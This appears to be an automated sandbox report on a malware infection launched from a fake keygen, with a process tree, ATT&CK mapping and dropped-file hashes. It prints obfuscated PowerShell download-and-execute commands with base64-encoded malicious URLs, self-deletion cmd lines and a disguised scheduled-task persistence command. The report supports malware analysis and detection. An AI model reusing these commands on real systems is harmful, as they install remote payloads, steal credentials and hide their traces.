"C:\Windows\System32\cmd.exe" /c taskkill /pid 1272 & erase C:\Users\Admin\AppData\Local\Temp\vbndfgame.exe & RD /S /Q C:\\ProgramData\\333368708752611\\* & exit
8⤵
PID:1464

C:\Windows\SysWOW64\taskkill.exe
taskkill /pid 1272
9⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3840

C:\Users\Public\yfu.exe
"C:\Users\Public\yfu.exe"
6⤵
- Executes dropped EXE
PID:1760

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\60C9.tmp\m1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
3⤵
- Suspicious use of WriteProcessMemory
PID:1584

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1508

C:\Windows\SysWOW64\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
PID:1576

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\60C9.tmp\b.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
3⤵
- Suspicious use of WriteProcessMemory
PID:396

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2344

C:\Users\Public\qdt.exe
"C:\Users\Public\qdt.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4212

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rmfigo.vbs"
6⤵
PID:4692

C:\Users\Admin\AppData\Local\Temp\Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
"C:\Users\Admin\AppData\Local\Temp\Uxqcrfgglyzuwogibeigruaconsoleapp12.exe"
7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4824

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Dvdljtaccvivylcfphls.vbs"
8⤵
PID:1796

C:\Users\Admin\AppData\Local\Temp\Dxndvkhrxwosconsoleapp14.exe
"C:\Users\Admin\AppData\Local\Temp\Dxndvkhrxwosconsoleapp14.exe"
9⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3204

C:\Users\Admin\AppData\Local\Temp\Dxndvkhrxwosconsoleapp14.exe
C:\Users\Admin\AppData\Local\Temp\Dxndvkhrxwosconsoleapp14.exe
10⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:4596

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /pid 4596 & erase C:\Users\Admin\AppData\Local\Temp\Dxndvkhrxwosconsoleapp14.exe & RD /S /Q C:\\ProgramData\\039961947608230\\* & exit
11⤵
PID:4660

C:\Windows\SysWOW64\taskkill.exe
taskkill /pid 4596
12⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4996

C:\Users\Admin\AppData\Local\Temp\Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
C:\Users\Admin\AppData\Local\Temp\Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
8⤵
- Executes dropped EXE
- Loads dropped DLL
- Accesses Microsoft Outlook profiles
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- outlook_office_path
- outlook_win_path
PID:2020

C:\Users\Admin\AppData\Local\Temp\cc.exe
"C:\Users\Admin\AppData\Local\Temp\cc.exe"
9⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Modifies system certificate store
PID:4184

C:\Users\Admin\AppData\Local\Temp\cc.exe
C:\Users\Admin\AppData\Local\Temp\cc.exe
10⤵
- Executes dropped EXE
PID:1556

C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\TelemetryServices\fodhelper.exe"
11⤵
- Creates scheduled task(s)
PID:4272

C:\Users\Admin\AppData\Local\Temp\pm.exe
"C:\Users\Admin\AppData\Local\Temp\pm.exe"
9⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4484

C:\Users\Admin\AppData\Local\Temp\aspnet_compiler.exe
C:\Users\Admin\AppData\Local\Temp\aspnet_compiler.exe
10⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5040

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "Uxqcrfgglyzuwogibeigruaconsoleapp12.exe"
9⤵
PID:4488

C:\Windows\SysWOW64\timeout.exe
C:\Windows\system32\timeout.exe 3
10⤵
- Delays execution with timeout.exe
PID:4564

C:\Users\Admin\AppData\Local\Temp\qdt.exe
C:\Users\Admin\AppData\Local\Temp\qdt.exe
6⤵
- Executes dropped EXE
PID:4848

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4848 -s 912
7⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4892

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\60C9.tmp\b1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
3⤵
- Suspicious use of WriteProcessMemory
PID:400

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1768

C:\Users\Public\sko.exe
"C:\Users\Public\sko.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4156

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rmfigo.vbs"
6⤵
PID:4704

C:\Users\Admin\AppData\Local\Temp\Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
"C:\Users\Admin\AppData\Local\Temp\Uxqcrfgglyzuwogibeigruaconsoleapp12.exe"
7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4836

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Dvdljtaccvivylcfphls.vbs"
8⤵
PID:1012

C:\Users\Admin\AppData\Local\Temp\Dxndvkhrxwosconsoleapp14.exe
"C:\Users\Admin\AppData\Local\Temp\Dxndvkhrxwosconsoleapp14.exe"
9⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3628

C:\Users\Admin\AppData\Local\Temp\Dxndvkhrxwosconsoleapp14.exe
C:\Users\Admin\AppData\Local\Temp\Dxndvkhrxwosconsoleapp14.exe
10⤵
- Executes dropped EXE
PID:4616

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4616 -s 1208
11⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4820

C:\Users\Admin\AppData\Local\Temp\Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
C:\Users\Admin\AppData\Local\Temp\Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
8⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2344

C:\Users\Admin\AppData\Local\Temp\Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
C:\Users\Admin\AppData\Local\Temp\Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
8⤵
- Executes dropped EXE
PID:4296

C:\Users\Admin\AppData\Local\Temp\sko.exe
C:\Users\Admin\AppData\Local\Temp\sko.exe
6⤵
- Executes dropped EXE
PID:4884

C:\Windows\SysWOW64\timeout.exe
timeout 2
3⤵
- Delays execution with timeout.exe
PID:596

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\60C9.tmp\ba.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
3⤵
- Suspicious use of WriteProcessMemory
PID:344

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2012

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\60C9.tmp\ba1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
3⤵
- Suspicious use of WriteProcessMemory
PID:1912

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1264

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\freebl3.dll
MD5
ef2834ac4ee7d6724f255beaf527e635

SHA1
5be8c1e73a21b49f353c2ecfa4108e43a883cb7b

SHA256
a770ecba3b08bbabd0a567fc978e50615f8b346709f8eb3cfacf3faab24090ba

SHA512
c6ea0e4347cbd7ef5e80ae8c0afdca20ea23ac2bdd963361dfaf562a9aed58dcbc43f89dd826692a064d76c3f4b3e92361af7b79a6d16a75d9951591ae3544d2

Download Submit
C:\ProgramData\freebl3.dll
MD5
ef2834ac4ee7d6724f255beaf527e635

SHA1
5be8c1e73a21b49f353c2ecfa4108e43a883cb7b

SHA256
a770ecba3b08bbabd0a567fc978e50615f8b346709f8eb3cfacf3faab24090ba

SHA512
c6ea0e4347cbd7ef5e80ae8c0afdca20ea23ac2bdd963361dfaf562a9aed58dcbc43f89dd826692a064d76c3f4b3e92361af7b79a6d16a75d9951591ae3544d2

Download Submit
C:\ProgramData\msvcp140.dll
MD5
109f0f02fd37c84bfc7508d4227d7ed5

SHA1
ef7420141bb15ac334d3964082361a460bfdb975

SHA256
334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4

SHA512
46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39

Download Submit
C:\ProgramData\msvcp140.dll
MD5
109f0f02fd37c84bfc7508d4227d7ed5

SHA1
ef7420141bb15ac334d3964082361a460bfdb975

SHA256
334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4

SHA512
46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39

Download Submit
C:\ProgramData\softokn3.dll
MD5
a2ee53de9167bf0d6c019303b7ca84e5

SHA1
2a3c737fa1157e8483815e98b666408a18c0db42

SHA256
43536adef2ddcc811c28d35fa6ce3031029a2424ad393989db36169ff2995083

SHA512
45b56432244f86321fa88fbcca6a0d2a2f7f4e0648c1d7d7b1866adc9daa5eddd9f6bb73662149f279c9ab60930dad1113c8337cb5e6ec9eed5048322f65f7d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Dxndvkhrxwosconsoleapp14.exe.log
MD5
e515039a8d5a085ff2e6b44d1a17a958

SHA1
f8a766108bde32e852915233bc043d6d7f8b74ec

SHA256
ee7d04f722b7f7c9750d2aad4919cc80b249593558a0b18ca818e0f64279d5f2

SHA512
bfe36952331f835f1b7c545ed39d57b910a0d4a922a05de4f813b5121dbd6dee5418bd43cb3b5e383d22d8860436c13c39d2e2133894dd1f31091d5cd1437f21

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Uxqcrfgglyzuwogibeigruaconsoleapp12.exe.log
MD5
e515039a8d5a085ff2e6b44d1a17a958

SHA1
f8a766108bde32e852915233bc043d6d7f8b74ec

SHA256
ee7d04f722b7f7c9750d2aad4919cc80b249593558a0b18ca818e0f64279d5f2

SHA512
bfe36952331f835f1b7c545ed39d57b910a0d4a922a05de4f813b5121dbd6dee5418bd43cb3b5e383d22d8860436c13c39d2e2133894dd1f31091d5cd1437f21

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
MD5
b751492c41c6f3173d3b6f31c1b9b4eb

SHA1
abc53a2c939b1d774940deb0b888b7b1ba5a3c7b

SHA256
ad95fdf313324ed94997cec026239ea3631bf27298500e5def5941db9493b457

SHA512
afa65279455b98353c6fe6869f2b545231231a953afbb1bf2eaed6b11646c4b4c77c5c18102651ae247a2f0fa18c698d908f4d23ca91581cbf28e32e061cb2e2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
MD5
5f640bd48e2547b4c1a7421f080f815f

SHA1
a8f4a743f5b7da5cba7b8e6fb1d7ad4d67fefc6a

SHA256
916c83c7c8d059aea295523b8b3f24e1e2436df894f7fae26c47c9bad04baa9c

SHA512
a6ac100a351946b1bbb40c98aeda6e16e12f90f81063aff08c16d4d9afec8ed65c2cbcf25b42946627d67653f75740b1137dab625c99e9492ba35aba68b79a8e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
MD5
5f640bd48e2547b4c1a7421f080f815f

SHA1
a8f4a743f5b7da5cba7b8e6fb1d7ad4d67fefc6a

SHA256
916c83c7c8d059aea295523b8b3f24e1e2436df894f7fae26c47c9bad04baa9c

SHA512
a6ac100a351946b1bbb40c98aeda6e16e12f90f81063aff08c16d4d9afec8ed65c2cbcf25b42946627d67653f75740b1137dab625c99e9492ba35aba68b79a8e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
8ef14b51bda4a71f0b50ccb47196a771

SHA1
145f4037fb474f92c15f924bb1deae3d464d06b0

SHA256
5fe45c1fca0b93b06c7ebbb230fb1e81bc10959e4d7e02ad56f001e942e5a1e5

SHA512
feeab434f42104e3bcf5400f32773c015f1dcacd967a454d511688da1f5f9bc28d2db13d254a10889c08a02ef0d440eb3be3f6c5be318e3bc87690e81127a1fe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
2f73e070d2d3d2adcafe4344c02abab4

SHA1
43e07ff00b6e022b1095ca365eec59240197b2dd

SHA256
12f76a99da060217a5893e9e442ebec524e897c384d00b18d56719bd77d8727e

SHA512
3d87856db5dfa6772811bc27eabc1f4efe124fb5496d6bc003bb61dd53c45203259deb444c9704c3c6371e41aa503376baa6c5c76017f501a1955ca05328f9f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
339ae448d389dc2d8d4d7bf3344ba7da

SHA1
4a1f843945bd94dc96f4812c45aa0ae6c9f35590

SHA256
e1e630cff221b9a5e284a5206062e271243eba8cdc81fc68226e277e47e3084c

SHA512
72bfa88ccc9b1edbc24140f4d5b1ec572233165685ea1dc3ed391e3a5a41013da872ca2f87836b0af8157f99dbd5e23a47fd86d54503af808867e13b320d1beb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
339ae448d389dc2d8d4d7bf3344ba7da

SHA1
4a1f843945bd94dc96f4812c45aa0ae6c9f35590

SHA256
e1e630cff221b9a5e284a5206062e271243eba8cdc81fc68226e277e47e3084c

SHA512
72bfa88ccc9b1edbc24140f4d5b1ec572233165685ea1dc3ed391e3a5a41013da872ca2f87836b0af8157f99dbd5e23a47fd86d54503af808867e13b320d1beb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5
4cffcae7869a0dfa93ebc39cca4d1ede

SHA1
c6520120e30ba5612a4fa79fdc28e46c36a2e1fe

SHA256
77cad338d133eb820a77984c61ef7bc0ba72cb33cded4dbe2b1921076997234c

SHA512
13f3839fe9c5fc6c8584ef3242e8e1b68e79512f10efff1478fec85eefddd55a71493514a28b67c753e1cd041463608ae08b3a67d6dd7ac2ac4ebc14f207919b

Download Submit
C:\Users\Admin\AppData\Local\Temp\60C9.tmp\Keygen.exe
MD5
ea2c982c12fbec5f145948b658da1691

SHA1
d17baf0b8f782934da0c686f2e87f019643be458

SHA256
eecd6f108f35df83d4450effa5d5640efe7e5f2fff819833f01fb2d053e626d4

SHA512
1f1d6768467fff8387be1cf536e01cfbf28cb04777fa184f18fcab0c518ead8d52827abe5ca1c566c425616c7b06ab1bce0c92dd684c818b51fc52fa0f4b74b8

Download Submit
C:\Users\Admin\AppData\Local\Temp\60C9.tmp\Keygen.exe
MD5
ea2c982c12fbec5f145948b658da1691

SHA1
d17baf0b8f782934da0c686f2e87f019643be458

SHA256
eecd6f108f35df83d4450effa5d5640efe7e5f2fff819833f01fb2d053e626d4

SHA512
1f1d6768467fff8387be1cf536e01cfbf28cb04777fa184f18fcab0c518ead8d52827abe5ca1c566c425616c7b06ab1bce0c92dd684c818b51fc52fa0f4b74b8

Download Submit
C:\Users\Admin\AppData\Local\Temp\60C9.tmp\b.hta
MD5
5bbba448146acc4530b38017be801e2e

SHA1
8c553a7d3492800b630fc7d65a041ae2d466fb36

SHA256
96355db8fd29dcb1f30262c3eac056ff91fd8fa28aa331ed2bedd2bd5f0b3170

SHA512
48e3d605b7c5531cb6406c8ae9d3bd8fbb8f36d7dd7a4cbe0f23fc6ef2df08267ce50d29c7ec86bf861ebdcf9e48fb9c61c218f6584f1a9a0289a10a2fec730b

Download Submit
C:\Users\Admin\AppData\Local\Temp\60C9.tmp\b1.hta
MD5
c57770e25dd4e35b027ed001d9f804c2

SHA1
408b1b1e124e23c2cc0c78b58cb0e595e10c83c0

SHA256
bb0fd0011d5a0c1bbb69cb997700eb329eee7bed75fef677122fcfda78edc7f5

SHA512
ac6d957d2b6218d9c19dea60b263d6148f730a7a4599e03023afc0881b9f4051d20e5f1d94fc3e416c5e12bcc9846a43af90f55767271ef0cc4b84f31f432ae7

Download Submit
C:\Users\Admin\AppData\Local\Temp\60C9.tmp\ba.hta
MD5
b762ca68ba25be53780beb13939870b2

SHA1
1780ee68efd4e26ce1639c6839c7d969f0137bfd

SHA256
c15f61a3c6397babdf83b99b45345fec9851c4d3669c95b717f756b7c48050d1

SHA512
f99570d2dae550cb1474e2d1cabf8296a685e0e7254d92eb21d856acb8dece635a0842a00d63da2a4faa18c52c57244c565d6a752c857d5c15e8c23b3d4a9e1a

Download Submit
C:\Users\Admin\AppData\Local\Temp\60C9.tmp\ba1.hta
MD5
a2ea849e5e5048a5eacd872a5d17aba5

SHA1
65acf25bb62840fd126bf8adca3bb8814226e30f

SHA256
0c4ffba2e00da7c021d0dcab292d53290a4dc4d067c029e5db30ba2ac094344c

SHA512
d4e53c150e88f31c9896decfaa9f0a8dfab5d6d9691af162a6c0577786620fb1f3617398fc257789a52e0988bf1bfc94255db6d003397863b0b9e82afabdb89f

Download Submit
C:\Users\Admin\AppData\Local\Temp\60C9.tmp\m.hta
MD5
9383fc3f57fa2cea100b103c7fd9ea7c

SHA1
84ea6c1913752cb744e061ff2a682d9fe4039a37

SHA256
831e8ee7bc3eeeaaa796a34cbb080658dec1be7eb26eb2671353f650041b220d

